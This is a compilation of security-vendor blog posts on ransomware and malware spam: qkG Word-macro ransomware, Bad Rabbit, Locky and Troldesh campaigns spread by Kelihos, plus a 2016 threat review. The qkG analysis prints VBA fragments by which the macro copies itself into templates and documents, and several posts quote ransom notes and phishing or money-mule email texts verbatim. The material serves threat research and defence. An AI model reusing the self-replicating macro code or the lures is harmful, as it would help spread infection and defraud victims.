This is done via the System.PrivateProfileString property, which has the interesting feature of writing REG_SZ values rather than REG_DWORD. Unfortunately, a fact that the malware authors must have overlooked, Microsoft Word is not able to read REG_SZ values. This means that opening an infected document will always require the following two conditions to be met, regardless of what the code actually tried to achieve:

  1. The VBA object model must have been manually enabled by the user:
  2. Macros must be enabled every single time a document is opened.

Note that even if the malware fails to automatically enable macros, the Lastline sandbox still detects this attempt and reports it as “Lowering macro security” with a high score. If condition (1) is met, qkG infects with its own code:

Set NT = NormalTemplate.VBProject.VBComponents.Item(1)
If NTLines > 0 Then NT.CodeModule.DeleteLines 1, NTLines
NT.Name = "qkG"
NT.CodeModule.AddFromString ("Private Sub Document_Close()")
NT.CodeModule.InsertLines 2, AD.CodeModule.Lines(2, ADLines - 1)

The code inside is then used to infect any other document the user might open afterwards:

Set AD = ActiveDocument.VBProject.VBComponents.Item(1)
If ADLines > 0 Then AD.CodeModule.DeleteLines 1, ADLines
AD.Name = "qkG"
AD.CodeModule.AddFromString ("Private Sub Document_Open()")
AD.CodeModule.InsertLines 2, NT.CodeModule.Lines(2, NTLines - 1)

Generally speaking, modifying macro code via CodeModule.DeleteLines and CodeModule.InsertLines is a suspicious activity per-se, and it is in fact flagged as such by the Lastline static document analyzer. As we can see from the code itself, the actual infection happens when the document is closed (Document_Close()), showing how important is for a sandbox to faithfully replicate the activity of a real user.

A Peculiar Behavior

Every time a document is either opened or closed, the malware encrypts the whole text and prepends the following ransom note:

This is quite unique, and it deviates from the ransomware behavior we usually see in malware such as WannaCry or BadRabbit where all files matching a set of extensions get encrypted. In this case, encryption, and thus the actual ransomware behavior, is tied to what the user is doing, and in particular to what documents he/she opens. Any technique tailored to detect ransomware in the general case would just fail here.


The malware does not enumerate or modify other files; it only encrypts a file when the user opens it by replacing its content. Because of all these reasons, automatically detecting this behavior as ransomware can be challenging if only generic behavioral techniques are used. A much more effective approach is instead a combination of static and dynamic analysis aimed at detecting as many behaviors as possible, hunting for those even a bit suspicious like modifying the macro code or altering the template file.

The post qkG: Simple Malware, Tricky Ransomware appeared first on Lastline.

Following The Bad Rabbit

On October 24th, media outlets reported on an outbreak of ransomware affecting various organizations in Eastern Europe, mainly in Russia and Ukraine. Identified as “Bad Rabbit”, initial reports about the ransomware drew comparisons with the WannaCry and NotPetya (EternalPetya) attacks from earlier this year. Though F-Secure hasn’t yet received any reports of infections from our own customers, we’re actively investigating. And while the investigation is still ongoing, initial results from our analysis did find similarities between Bad Rabbit and the NotPetya ransomware that hit companies late last June.

We think there’s good evidence that suggests the same person or group is responsible for both last June’s NotPetya attacks and what we’re seeing now with Bad Rabbit. Malware authors often learn from what works, so finding the same characteristics in different families is not uncommon. But the similarities we’re seeing here are too much to be just one attacker copying another.

Without getting too technical, here’s a handful of the similarities between NotPetya and Bad Rabbit:

  • Overall code structure is similar
  • File encryption code is VERY similar
  • Similar method of checking existing processes and encrypting files
  • Similar method used to reboot computers
  • Same trick used to launch the malware’s main component as a DLL
  • Identical code used to parse the command line
  • Similar propagation methods, including an identical “library” of other computers found in the network, and use of Mimikatz to gather credentials
  • Out of 113 file extensions used by BadRabbit, 65 are shared with NotPetya (Bad Rabbit has an additional 48)

There are also some notable differences between the two, including:

  • Bad Rabbit doesn’t use EternalBlue/EternalRomance exploit
  • Bad Rabbit doesn’t use PsExec to spread
  • Bad Rabbit also encrypts “home user” files, such as .jpgs
  • Bad Rabbit adds “.encrypted” to the contents of affected files (NotPetya didn’t do this, making it harder to distinguish between encrypted and non-encrypted files)
  • Bad Rabbit’s infection vector is via compromised websites. While NotPetya was reported to be via MeDoc
  • Bad Rabbit brute-forces using a set of predefined credentials to available SMB shares
  • The list of process hashes to be compared to are different from NotPetya. NotPetya compares against Symantec and Kaspersky processes, while Bad Rabbit compares against McAfee and DrWeb

Like NotPetya, Bad Rabbit will display the two ransom note – one for MBR encryption.

Bad Rabbit Message

And a text note for file encryption.

Oops! Your files have been encrypted.

If you see this text, your files are no longer accessible.
You might have been looking for a way to recover your files.
Don't waste your time. No one will be able to recover them without our
decryption service.

We guarantee that you can recover all your files safely. All you
need to do is submit the payment and get the decryption password.

Visit our web service at caforssztxqzf2nm.onion

Your personal installation key#2: [REDACTED]

Users are directed to pay the ransom at a specified payment site, which also provides the amount of the ransom to be paid.

Bad Rabbit Payment Site

A threat description of the Bad Rabbit ransomware is available at Trojan:W32/Rabbad and will be updated as and when more details are confirmed.

In the meantime… our endpoint protection products have a variety of measures baked in that prevent Bad Rabbit infections.

Edited to update: Struckthrough EternalRomance mention above. We have verified the same observations as Cisco Talos Security about EternalRomance exploited by Bad Rabbit.

Malware spam: "Emailing: Scan0xxx" from "Sales" delivers Locky or Trickbot

This fake document scan delivers different malware depending on the victim's location: Subject:       Emailing: Scan0963 From:       "Sales" [sales@victimdomain.tld] Date:       Thu, September 28, 2017 10:31 am Your message is ready to be sent with the following file or link attachments: Scan0963 Note: To protect against computer viruses, e-mail programs may prevent sending or receiving

Malware spam: "AutoPosted PI Notifier"

This spam has a .7z file leading to Locky ransomware. From:      "AutoPosted PI Notifier" [NoReplyMailbox@redacted.tld] Subject:      Invoice PIS9344608 Date:      Tue, September 26, 2017 5:29 pm Please find Invoice PIS9344608 attached. The number referenced in the spam varies, but attached is a .7z archive file with a matching filename. In turn, this contains one of a number of malicious VBS

Malware spam: "Invoice RE-2017-09-21-00xxx" from "Amazon Marketplace"

This fake Amazon spam comes with a malicious attachment: Subject:       Invoice RE-2017-09-21-00794 From:       "Amazon Marketplace" [] Date:       Thu, September 21, 2017 9:21 am Priority:       Normal ------------- Begin message ------------- Dear customer, We want to use this opportunity to first say "Thank you very much for your purchase!"

Malware spam: "Status of invoice" with .7z attachment

This spam leads to Locky ransomware: Subject:       Status of invoice From:       "Rosella Setter" ordering@[redacted] Date:       Mon, September 18, 2017 9:30 am Hello, Could you please let me know the status of the attached invoice? I appreciate your help! Best regards, Rosella Setter Tel: 206-575-8068 x 100 Fax: 206-575-8094 *NEW*   Ordering@[redacted].com * Kindly note we will be

Malware spam: "Scanning" pretending to be from

This spam email pretends to be from but it is just a simple forgery leading to Locky ransomware. There is both a malicious attachment and link in the body text. The name of the sender varies. Subject:       ScanningFrom:       "Jeanette Randels" []Date:       Thu, May 18, 2017 8:26 pm Jeanette Randels

Cyber Security Roundup for August 2017

TalkTalk yet again made all the wrong cyber security headlines in the UK this month, after it was handed a £100,000 fine by the Information Commissioner's Office (ICO) for not adequately protecting customer records from misuse by its staff. The ICO investigated the Internet Service Provider after receiving complaints from customers, who said they received cold calls from scammers who knew their TalkTalk account information.

Second-hand goods firm CeX disclosed a compromise of up to 2 million online customer accounts due to a hack, however, CeX has yet to disclose any details about the cyber attack. My blog post and advice about this is here

Hackers had a field day taking over social media accounts, from Real Madrid and FC Barcelona to Game of Thrones, much embarrassment could have been avoided if they had adopted multi-factor authentication on the accounts, aside from the spate of Instagram hacks which were caused by the exploitation of a software vulnerability, namely within Instagram's API.

In what looks like a follow on from the UK's Parliament's email brute force email account attack in June, the Scottish Parliament was hit by a very similar cyber attack, it was reported, as per the Westminister attack, many SMPs were found to be using weak passwords. Let's hope the Welsh Assembly have taken note and have learned the password security lessons.

A massive 'spambot' holding 711 million email addresses was found to be spreading malware by a security researcher. It was said to have been put together using stolen data from previous LinkedIn and Badoo data breaches. Using legitimate email addresses helps in the avoidance of anti-phishing and spam filters.

On the ransomware front, LG reported WannaCry caused a two-day shutdown of its business in South Korea. TNT customers were said to be furious after NotPeyta badly affected its ability to deliver hundreds of thousands of items, particularly within in the Ukraine. And Digital Shadows reported a trend in cyber criminals dropping Exploit kits for Ransomware, as there is simply a lot more money to be made out of ransomware attacks.

On the critical security patching, Microsoft released 25, Adobe released 43, and Drupal patched a critical bug. And there was an interesting article posted by Microsoft on Cyber Resilience worth reading.


Malware spam: "Voicemail Service" / "New voice message.."

The jumble of numbers in this spam is a bit confusing. Attached is a malicious RAR file that leads to Locky ransomware. Subject:       New voice message 18538124076 in mailbox 185381240761 from "18538124076" <6641063681>From:       "Voicemail Service" [vmservice@victimdomain.tdl]Date:       Fri, August 25, 2017 12:36 pmDear user:just wanted to let you know you were just left a 0:13 long

Malware spam: "Your Sage subscription invoice is ready" /

This fake Sage invoice leads to Locky ransomware. Quite why Sage are picked on so much by the bad guys is a bit of a mystery. Subject:       Your Sage subscription invoice is readyFrom:       "" []Date:       Thu, August 24, 2017 8:49 pmDear CustomerYour Sage subscription invoice is now ready to view.Sage subscriptions To view your Sage subscription

Multiple badness on /

Two massive fake "Bill" spam runs seem to be under way, one claiming to be from BT and the other being more generic. Subject:       New BT BillFrom:       "BT Business" []Date:       Thu, August 24, 2017 6:08 pmPriority:       NormalFrom BTNew BT BillYour bill amount is: $106.84This doesn't include any amounts brought forward from any other bills.We've put your latest

Malware spam: "Customer Service" / "Copy of Invoice xxxx"

This fairly generic spam leads to the Locky ransomware: Subject:       Copy of Invoice 3206From:       "Customer Service" Date:       Wed, August 23, 2017 9:12 pmPlease download file containing your order information.If you have any further questions regarding your invoice, please call Customer Service.Please do not reply directly to this automatically generated e-mail message.Thank

Malware spam: "Voice Message Attached from 0xxxxxxxxxxx – name unavailable"

This fake voice mail message leads to malware. It comes in two slightly different versions, one with a RAR file download and the other with a ZIP. Subject:       Voice Message Attached from 001396445685 - name unavailable From:       "Voice Message" Date:       Wed, August 23, 2017 10:22 am Time: Wed, 23 Aug 2017 14:52:12 +0530 Download

Cerber spam: "please print", "images etc"

I only have a couple of samples of this spam, but I suspect it comes in many different flavours.. Subject:       imagesFrom:       "Sophia Passmore" [Sophia5555@victimdomain.tld]Date:       Fri, May 12, 2017 7:18 pm--*Sophia Passmore*Subject:       please printFrom:       "Roberta Pethick" [Roberta5555@victimdomain.tld]Date:       Fri, May 12, 2017 7:18 pm--*Roberta Pethick* In these two

Twelve Commandments that will never fail to Keep You Cyber Safe Online

As the digital world explodes with a variety of new online services, cyber threats have become more ingenuous, dangerous, and spawned multiple variants and types. As each new threat makes the headline, the accompanying set of threat specific security recommendations confuses cybercitizens. Cybercitizens want a comprehensive list of recommendations that do not change frequently.

There are twelve foundational security practices that will help keep you and your family safe. Practicing them will harden your defenses against cybercrime and also reduce the negative effects of social media use.

1)    Thou shalt not use a device with pirated software
Pirated software is not patched as it is unlicensed. Unpatched software have security vulnerabilities which can be easily exploited to steal data and credentials

2)    Thou shalt not use a device which is not set for automatic updates of Operating System patches
Automatic patching for personal devices is the best way to ensure that the latest security patches are applied and security loopholes closed before cybercriminals can get to them

3)    Thou shalt not use a device without updated antimalware (antivirus) software installed
Antimalware software reduces the probability of a malware infection (e.g. ransomware) on your device. For it to be effective to catch the latest malware variants, it has to be automatically updated with the latest updates.

4)    Thou shall not download pirated movies, games and other such material
Something free may turn out to be expensive, both financially and to your reputation. Malware is usually bundled with pirated content or applications

5)    Thou shall not use a site without trying to verify its authenticity
Authenticity of a site can be verified by the Lock Icon and accompanying digital certificate. While not fool proof, it reduces the possibility of spoofed lookalike sites designed to steal your credentials

6)    Thou shall not ignore inappropriate content on social networks, always report or dislike it
Inappropriate content influences the minds of our children as they stumble upon it online. Hate content in particular may induce biases which take a long time to reverse.

7)    Thou shalt not indulge or encourage cyber bullying online
A parent or teacher has the additional responsibility of guiding children on the right online behavior. You do not want your children to bully or be bullied

8)    Thou shalt not use passwords that can be easily guessed and promise to  keep the password a secret
Try to choose complex passwords, do not reuse them on multiple sites and always store them securely. The easiest way to get into your online accounts is by stealing your passwords

9)    Thou shalt not fall be tempted by fraudulent emails promising financial windfalls or miracle cures or cheap medicines
Try to check the authenticity of the email. Electronic communication is easily manipulated, as it is difficult to verify the authenticity of the sender. Scams like these can cost you money and affect your health.

10) Thou shall not forsake your responsibility of helping your older parents or young kids to be safe as they use the internet
Be a guide and easily available as both old and young learn to use the internet and face cyber risks. Being available, requires that you can be reached for instant advice on problems they encounter

11) Thou shalt never trust a stranger blindly online
Always be suspicious when dealing with online strangers. At any point during the relationship never let down your guard. The identity of an online person cannot be easily verified. It can however be easily manipulated. Online friends sometimes have the vilest of intention which can lead to all forms of blackmail, particularly if they have incriminating pictures and videos. Besides adults, young children are potential victims

12) Thou shalt not set a weak password for your mobile phone or keep it unlocked
A stolen phone with an easy to guess password or if unlocked, is a sure invitation into all your signed in accounts and personal data. A large number of phones are left unattended or lost each year.

A User-Friendly Interface for Cyber-criminals


Installing malware through Remote Desktop Protocol is a popular attack method used by many cyber-criminals. over the past few months Panda Security’s research facility PandaLabs, has analysed several attacks of this nature.

Once credentials are obtained through brute a force attack on the RDP, the cyber-criminals gain access to the company. Attackers simply execute the corresponding malware automatically to start the encryption.

wysiwye-530x483Recently however, PandaLabs has noticed more personalised attacks. Analysing this intrusion we see that the ransomware comes with its own interface, through which its can be configured according to the attackers preferences. Starting with details such as which email address will appear in the ransom note. This customised attack makes it possible to hand-pick the devices the hackers would like to action on.

Advanced attacks we continue to see in this environment require businesses to employ a corporate network security strategy. Preventing zero-day attacks from entering your network is essential, along with efforts to neutralise and block attacks.

Data collected from Panda clients in Europe indicated that Panda Adaptive Defense 360 (AD360) was able to detect and block this particular attack. Timely investment in prevention, detection and response technology, such as AD360 guarantees better protections against new age threats.

The post A User-Friendly Interface for Cyber-criminals appeared first on

Cyber Security Predictions for 2017



2016 kicked off with more than 20 million new samples of malware detected and neutralised by PandaLabs – an average of 227,000 per day. This figure is slightly higher than that of 2015, which saw around 225,000 per day.

Throughout 2016, we’ve seen how the number of new malware has been slightly lower than in 2015 — about 200,000 new samples of malware per day on average — however attacks have become more effective.

Cybercriminals are becoming more confident in their abilities, and, although figures have been lower than expected, there is still cause for concern. Hackers appear to be concentrating their efforts into the most profitable attacks, utilising sophisticated techniques that allow them to make quick and easy money in an efficient manner.

Black Hats have turned their focus essentially to productivity, proliferating attacks on businesses that handle massive quantities of data and sensitive information. Once they’ve gained access to these businesses, they are able to infect a large number of computers possible with ransomware, putting themselves in a position to demand millions in ransom or put the data up for sale on the black market.

If there is one thing that hasn’t changed over the course of this year, it’s the popularity of trojans, with ransomware at the forefront, continuing to top the statistical charts for years.

Ranking the top attacks of 2016



We know that ransomware is a substantial business for cybercriminals, but it is incredibly tricky to measure the number of attacks reliably. What can be noted is the evolution of Ransomware attacks, in some cases having become particularly aggressive, as is the case of Petya. Instead of encrypting documents, Petya goes straight for the computer’s Master Boot Record (MBR) and makes it unserviceable until a ransom is paid.

Abuse of system tool PowerShell has risen this year, installed by default in Windows 10 and frequently used in attacks to avoid detection by security solutions installed on victims computers.

In Q2 of 2016, one of the strangest cases of Ransomware involved a company in Slovenia. The company’s head of security received an email out of Russia informing him that their network had been compromised and that they were poised to launch ransomware on all of their computers. If the company didn’t pay around €9000 in Bitcoins within 3 days. To prove that they did in fact have access to the organisations network, the hackers sent a file with a list of every device connected to the company’s internal network.

Ransomware as a Service (RaaS) presented as the latest development in the Ransomware industry. In Q3 we witnessed to a higher level of specialisation in the ransomware trade. The best example of this featured the creators of the ransomware Petya and Mischa, specialised in the development aspect of malware and its corresponding payment platforms, leaving distribution in the hands of third parties. Once the creators have done their part they leave it up to the distributors to be in charge of infecting their victims. Much like in the legal world, the distributors’ profit is derived from a percentage of the money acquired. The higher the sales, the higher the percentage that they receive.

Malicious email

Attacks don’t only come in the form of malvertising or compromised websites. A large number of them still arrive through email in the form of false invoices or other notifications. An attack of this sort was carried out in at least two European countries, in which cybercriminals posed as their respective local electricity supply companies. The message contained no attachment, showing only the billing information in text and including a link that when clicked would take you to the invoice details. The hook was an exorbitantly high payment that would entice an emotional response so that the recipient would click through to consult the supposed bill without thinking. Upon clicking the link, the user was directed to a website that resembled the company’s real website, where a bill could be downloaded. If the client downloaded and opened the file, they became infected with ransomware.

Business Email Compromise Phishing

Hackers will investigate how the company operates from the inside and get information from their victims off of social networks to give credibility to their con. The attackers then pose as the CEO or financial director of a company and request a transfer from an employee. This kind of attack is rapidly gaining in popularity.

A notable case this year affected Mattel, the well-known toy manufacturer of Barbies and Hot Wheels. A high ranking executive received a message from the recently appointed CEO soliciting a transfer of $3 million to a bank account in China. After making the transfer, he then confirmed with the CEO that it was done, who in turn was baffled, having not given such an order. They got in touch with the American authorities and with the bank, but it was too late and the money had already been transferred.

In this case they were fortunate. It was a bank holiday in China and there was enough time to alert the Chinese authorities. The account was frozen, and Mattel was able to recover their money.


Mobile Devices

SNAP is one the most popular vulnerabilities that we’ve seen this year – affecting LG G3 mobile phones. The problem stemmed from an error in LG’s notifications app, called Smart Notice, which gives permission for the running of any JavaScript. The researchers at BugSec discovered the vulnerability and notified LG, which rapidly published an update that resolved the problem.

Gugi, an Android trojan, managed to break through Android 6’s security barriers to steal bank credentials from apps installed on the phone. To accomplish this, Gugi superimposed a screen on top of the screen of the legitimate app asking for information that would then be sent directly to the criminals without their victims’ knowledge.

In August, Apple published an urgent update of version 9.3.5 of iOS. This version resolves three zero-day vulnerabilities employed by a software spy known as Pegasus, developed by the NGO Group, an Israeli organization with products similar to those offered by Hacking Team.

Internet of Things

Connected cars are at risk from cyber-attack – investigators at the University of Birmingham showed how they had succeeded in compromising the power door lock system of every vehicle sold by the Volkswagen Group in the last twenty years. Researchers Charlie Miller and Chris Valasek, who last year demonstrated how to hack a Jeep Cherokee, took it one step further this year to show how they could manipulate at will the throttle, the brake, and even the steering wheel while the car was in gear.

Smart homes are just as vulnerable to attack – researchers Andrew Tierney and Ken Munro showed a proof of concept that they built to hijack a thermostat. After taking control of the thermostat (inserting an SD card in it), he raised the temperature to 99 degrees Fahrenheit and required a PIN to deactivate it. The thermostat connected to an IRC channel, giving the MAC address of as an identifier of every compromised device. It demanded a bitcoin in exchange for the PIN, which changed every 30 seconds.



2016 saw the United States go on the offensive and concede that it is launching cyber-attacks against Daesh targets. Robert Work, United States Deputy Secretary of Defense, made this clear in statements to CNN.

In February, South Korean officials discovered an attack originating from North Korea. The attack allegedly began over a year ago, its primary target being 140,000 computers belonging to organisations and government agencies, as well as defense contractors. According to police statements, more than 42,000 documents were stolen, of which 95% were related to defense, such as, for example, documents containing plans and specs for the F15 fighter jet.

At the height of the United States presidential election, one of the most significant incidents that took place was the discovery of an attack on the DNC (Democratic National Committee) in which a stockpile of data was plundered, and was then leaked to the public.

On the subject of the elections, the FBI issued an alert after detecting two attacks on electoral websites, and at least one of the attackers — identified as foreigners — was able to make off with voter registration data.

In August, a group calling itself “The Shadow Brokers” announced that it had hacked the NSA and published some of the “cyber weapons” that it had stolen, promising to sell the rest to the highest bidder.


In June, a criminal dubbed “The Dark Overlord” put patient information from three US institutions up for sale on the black market. He had stolen information from over 650,000 patients and asked for around $700,000 for its return. Shortly thereafter, he put the personal information of 9.3 million clients of a medical insurance agency up for sale for 750 bitcoins.

In the last few months, Dropbox became another victim of cybercrime. It was recently revealed that the well-known file sharing service suffered an attack in 2012. The outcome: the theft of data from 68 million users.

One of the biggest attacks to date affected Yahoo – despite having taken place in 2014 the attack only become known recently. A total of 500 million accounts were compromised, becoming the greatest theft in history.

In August 2016 we saw one of the greatest bitcoin thefts in history. Bitfinex, a company that deals in the commerce and exchange of cryptocurrency, was compromised and had an equivalent of 60 million dollars in bitcoins stolen from it, money which belonged to clients that had deposited their bitcoins in this “bank”. There is still no evidence pointing to the culprits, and the company has offered no information as to how it happened, as law enforcement agencies are still investigating the case.

DDoS Attacks

In September, Brian Krebs, the famed journalist specialising in security, blew the cover off of vDOS, a “business” that offered DDoS attack services. Shortly thereafter, the people responsible, who in two years had lead 150,000 attacks and made a profit of $618,000, were arrested.

In retaliation hackers took down Krebs’s website through a crippling DDoS attack. In the end, Google, through its Project Shield, was able to protect it and the page came back online.

In the last quarter of the year, a wave of large-scale cyberattacks against the American internet provider DynDNS disrupted the service of some major global corporations’ websites. The brutal attack affected major organisations and international communications tools, such as Netflix, Twitter, Amazon, and The New York Times. Service was interrupted for almost 11 hours, affecting more than a billion clients worldwide.


POS’s and Credit Cards

The popular American fast food chain Wendy’s saw the Points of Sale terminals at more than 1,000 of its establishments infected with malware that stole credit card information from its clients. PandaLabs discovered an attack carried out with malware known as PunkeyPOS, which was used to infect more than 200 US restaurants.

Another such attack was discovered in 2016 by PandaLabs. Once again, the victims were US restaurants, a total of 300 establishments whose POS’s had been infected with the malware PosCardStealer.

Financial Institutions

This year, the Central Bank of Bangladesh suffered an attack in which 1 billion US dollars in bank transfers were made. Fortunately, a large portion of those transfers were blocked, although the thieves had already succeeded in making off with 81 million dollars.

Shortly after that we witnessed two similar cases: one against a bank in Vietnam, another against a bank in Ecuador.


Social Networks

The security of 117 million LinkedIn users was at risk after a list of email address and their respective passwords were published.

On Twitter, 32 million usernames and passwords were put up for sale for around $6000. The social network denied that the account information had been aquired from their servers. In fact, the passwords were in plain text and the majority of them belonged to Russian users, hinting at the possibility that they were attained by means of phishing or Trojans.

This year it came to light that MySpace was attacked. The intrusion happened in 2013, although up until May of this year it remained unknown. Usernames, passwords, and email addresses were taken, reaching up to 360 million affected accounts. A user may not have used MySpace in years, but if they are in the habit of reusing passwords, and aren’t using two-factor authentication they could be at risk.

Activating two-factor authentication, creating complex passwords and not reusing them for different websites is recommended to avoid these risks.

What cyber nightmares does 2017 have in store for us?


Having taken center stage in 2016, Ransomware will most likely do so again in 2017. In some ways, this kind of attack is cannibalising other more traditional ones that are based on information theft. Ransomware is a simpler and more direct way to make a profit, eliminating intermediaries and unnecessary risks.

Taking every idea into consideration


Attacks on companies will be more numerous and sophisticated. Companies are already the prime target of cybercriminals. Their information is more valuable than that of private users.

Cybercriminals are always on the lookout for weaknesses in corporate networks through which they can gain access. Once inside, they use lateral movements to access resources that contain the information they are looking for. They can also launch large-scale ransomware attacks (infecting with ransomware all available devices), in order to demand astronomical sums of money to recover the data of affected companies.

Internet of Things

Internet of Things (IoT) is fast becoming the next cybersecurity nightmare. Any kind of device connected to a network can be used as an entryway into corporate and home networks. The majority of these devices have not been designed with security strength in mind. Typically they do not receive automatic security updates, use weak passwords, reuse the same credentials in thousands of devices, and other security flaws – all of this together makes them extremely vulnerable to outside attacks.


The final months of 2016 witnessed the most powerful DDoS attacks in history. It began in September with an attack on Brian Krebs after his having reported on the activities of an Israeli company that offered this kind of service. On the heels of that attack came another on the French company OVH (reaching 1Tbps of traffic) and another on the American company Dyn that left several major tech giants without Internet service.

These attacks were carried out by bot networks that relied on thousands of affected IoT devices (IP cameras, routers). We can be certain that 2017 will see an increase in this kind of attack, which is typically used to blackmail companies or to harm their business.

Mobile Phones

The target is clear here as well — Android devices got the worst of it. Which makes sense, given that Android has the greatest market share. Focusing on one single OS makes it easier for cybercriminals to fix a target with maximal dissemination and profitability.

To complicate matters, updates do not only depend on the rollout of what Android can do, but also depends on each hardware manufacturer’s decision of when and how to incorporate them – if at all. Given the amount of security issues that crop up every month, this situation only puts users at greater risk.


We are living in uncertain times with regards to international relations – threats of commercial warfare, espionage, tariffs with the potential to polarise the positions of the great powers. This can no doubt have vast and serious consequences in the field of cyber-security.

Governments will want access to more information, at a time when encryption is becoming more popular) and intelligence agencies will become more interested in obtaining information that could benefit industry in their countries.

A global situation of this kind could hamper data sharing initiatives — data that large companies are already sharing in order to better protect themselves against cyber-crime, setting standards and international engagement protocols.

The post Cyber Security Predictions for 2017 appeared first on

NoMoreRansom aka Troldesh Ransomware Delivered by Kelihos

My favorite guest blogger Arsh Arora, a malware analyst and Ph.D. researcher at UAB,  is back with new and interesting facts about Kelihos, a botnet family that he has been tracking for a year and half and providing some great intel about to the community and law enforcement. Today, he noticed that it is delivering URLs leading to Troldesh ransomware. Take it from here, Arsh ...

Kelihos botnet delivering Troldesh Ransomware impersonating Bank of America

No_More_Ransom, aka Troldesh encryption ransomware, is being delivered by Kelihos in the form of embedded URLs within the email messages. The delivery mechanism is similar to previous cases of ransomware spammed by Kelihos. In early July, Kelihos introduce itself to the world of ransomware by spamming links to Wildfire ransomware followed by CryptFIle2 ransomware in August. Then, it shifted its focus towards different banking trojans such as Panda Zeus, Nymain and Kronos. Now, it took a complete circle and struck back with Troldesh encryption ransomware. The funny thing is that the ransomware encrypted the files with the extension ".no_more_ransom". Moreover, the URLs spammed were redirected to download a JavaScript file and a Microsoft Word document. This is the first time that Kelihos malware has used JavaScript to infect users.

Another interesting observation was that this spam campaign was specifically geo-targeting Australian email addresses ending with ".au".  ".pl" email users were getting dating spam, while ".us" extension emails were being invited to sign up as Money Mules.  All other email TLDs were getting the traditional pharmaceutical spam.

NoMoreRansom aka Troldesh Ransomware

While doing the daily run of malware, one of my fellow researchers at UAB, Max Gannon, noticed a different behavior in the Kelihos botnet. It was sending embedded links using the Credit Debt theme. The most important fact is that some of the URLs were redirected to download a .zip file containing a JavaScript file, while other links download a Microsoft Word document. When writing this blog, most of the URLs were still live. 

Subject: Please Settle Credit Arrears Shortly

Dear Client!

Our Credit Department has done research on your payment record for last year and learned that payments had not been made for last 3 months. We are now working on the issue pertaining to ways to help you with fulfilling liabilities and settling these arrears.

At the same time, we realize you may have had excellent reasons for such payment breakdown. That is exactly why we are contacting you now. Notwithstanding, if you are not proceeding your debt settlement, we will have to engage our enforcement units in commencing the law-suit case against you. This is the compulsory measure, so unfortunately, we may not help you.

Please process at least the very first payment at the earliest possible time. Else, charges may apply, and then the trial may be run.

We have made the full report of your situation. It contains the payment history, the total debt amount effective today, and further recommendations on arranging the issue. Please open and be guided with instructions as soon as possible.

The file can be found here: 

Sincerely Yours,
Bank of America
Customer Relations Department

The following are the different subject lines that were spammed:
URLs that downloaded a .zip file containing JavaScript

Subject - Credit Department Discovered Your Debt - 

Subject - Pay for Credit Debt when Possible - 

Subject - Please Settle Credit Arrears Shortly - 

Subject - You Have a 3-Month Credit Debt - 

Fig. 1: Zip file downloaded with the embedded URL link

URLs that downloaded a Microsoft Word document

Subject - Please Settle Credit Arrears Shortly - 

Subject - You Have a 3-Month Credit Debt - 

URL that were unreachable

Subject - Pay for Credit Debt when Possible - 
hxxp://starsounds[dot]net/wp-content/themes/twentyeleven/redirect[dot]php - Down

Infection by JavaScript has not been an associated behavior with Kelihos. Hence, it can be considered a noticeable change and well-thought out strategy by the bot operators.

Hashes of the JavaScript and Word document are:

    1d57eba1cb761b99ffcf6bc8e1273e9c  instructions.doc
711881576383fbfeaaf90b1d6c24fce0  instructions.js

On the other hand, embedded URLs for Microsoft Word documents have been seen before. The document performed in a similar fashion requesting to enable the macros by clicking "Enable Content" aka "Encrypt Me" button. After this process it downloads a payload from the following link:

MD5 - 8441efe3901a0ec7f18c6ef5159877cc

Virus Total Link - 777.exe VT

After the file is downloaded, it encrypts the system with the Troldesh encryption ransomware and adds the "no_more_ransom" extension at the end of each file on the system. The ransom note on the desktop was displayed in Russian as well as English.

Fig. 2: Desktop screen after encryption

Fig. 3: Ransom Note found in text ReadMe.txt

All the important files on your computer were encrypted.
To decrypt the files you should send the following code:
to e-mail address 2Lynness.Taftfera1990@gmail[dot]com .
Then you will receive all necessary instructions.
All the attempts of decryption by yourself will result only in irrevocable loss of your data.
If you still want to try to decrypt them by yourself please make a backup at first because
the decryption will become impossible in case of any changes inside the files.
If you did not receive the answer from the aforecited email for more than 48 hours (and only in this case!),
use the feedback form. You can do it by two ways:
1) Download Tor Browser from here:
Install it and type the following address into the address bar:
Press Enter and then the page with feedback form will be loaded.
2) Go to the one of the following addresses in any browser:

The above is a plain text version of the ransom note. As it can be seen, a Gmail address is being use, which is one of its kind behavior.

Troldesh did not stop trolling the victim there, it downloads the PONY malware and contacts its command and control center at this location:


When I visited the link it was down, but thanks to our Malware expert Neera Desai who works for PhishMe and is pursuing her Masters in Computer Forensics at UAB, we were able to visit the panel page of the Pony malware.

Fig. 4: Pony malware panel page

This was really fascinating as Kelihos spammed URLs for Troldesh encryption ransomware with redirects to a malicious Microsoft Word document and a zip file containing JavaScript. The files eventually encrypt the system but it also downloads the Pony malware to steal all the information from the victim's computer. Hence, causing a double blow to the victim.

Money Mule Spam 

Kelihos botnet was not in a mood to stop. It also sent Money Mule spam geo-targeting users with the ".us" United States email address. It impersonated a company from 'China looking for employees'. 

Text of the email is as follows:

Subject: China company is looking for employees

We are the greatest transport company in China involved in 
transportation of high-dimension goods across the globe. At present, 
we are aimed at expanding by opening offices across the globe for 
deliveries of small consignments. We are looking for employees to 
open offices and ensure services (deployment and supervision of 
packages). All costs for the office establishment are undertaken by 
the organization. During the first month of your job, you and our 
employees are to be engaged in searching for the storage structure. 
You will be also required to appoint some amount of orders to your 
home address (not more than 10kg parcels a day) in order to check 
them for flaws and ship forward with pre-paid labels. We have a 
certain flow of parcels to date, and the work is already jogging on; 
if you are ready to start your operation right away, we are ready to 
pay 2800$ a month. In due course your salary will increase up to 
3500$ if you agree to work in the future office.

You have the following options of working with us:
1. You are working at home for the first month, receiving packages 
and shipping them forward; starting looking for an office place in 
your town (all the instructions you will receive from our managers)
2. You continue to work from home and get 2900$ every month, plus 
bonuses for fast shipped package
3. If something doesn't fit you and you decide to stop the job with 
us, we will pay you monthly salary and be waiting for you again in 
our team in the future!

If you have any questions please contact us at: kia01915@aol[dot]com

All costs for establishment the office are taken by the company, 
shipping is made with prepaid labels, this job does not require any 
financial investment from you. You can also combine this work with 
another one if you decide to work in the office in the future.
The convenient control panel of a corporate website will help you to 
track parcels, bonuses you are to get for a shipped package, and your 
personal information for salary and further job instructions.

The company ensures the following advantages:
1. Health benefits
2. Paid vacations and sick leaves
3. Paid flight tickets, gasoline

This is a temporary offer, as soon as we have a team of employees in 
your staff the vacancy will be closed.

Please contact our HR manager for further details: kia01915@aol[dot]com
Other subject lines that were spammed in the same theme are mentioned below with their corresponding reply-to email address.

Subject - China company is looking for employees - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - kia01915@aol[dot]com
Subject - We are hiring new employees to our office - bree10682@aol[dot]com

